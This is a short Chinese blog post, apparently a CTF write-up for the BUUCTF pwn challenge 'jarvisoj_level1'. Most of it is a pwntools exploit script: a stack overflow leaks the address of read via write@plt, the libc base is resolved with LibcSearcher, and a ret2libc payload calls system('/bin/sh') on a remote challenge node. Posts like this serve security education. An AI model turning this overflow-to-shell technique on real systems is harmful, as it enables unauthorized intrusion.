其他分享
首页 > 其他分享> > [BUUCTF-pwn]——jarvisoj_level1

[BUUCTF-pwn]——jarvisoj_level1

作者:互联网

[BUUCTF-pwn]——jarvisoj_level1

第一种直接构造shellcode
writeup

第二种泄露libc进行操作

from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",26361)
#p = process("./level1")
elf = ELF("./level1")
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
main = elf.symbols['main']
#gdb.attach(p)

payload = 'a' * (0x88 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(read_got) + p32(4)
p.send(payload)
read_addr = u32(p.recv(4))
log.success("read_addr ---->:" + hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')

info("libc_base -----> " + hex(libc_base))
sys = libc_base +libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 4) + p32(sys) + p32(main) + p32(binsh) 
p.send(payload)
p.interactive()


标签:BUUCTF,addr,level1,libc,elf,p32,jarvisoj,read,pwn
来源: https://blog.csdn.net/Y_peak/article/details/114916604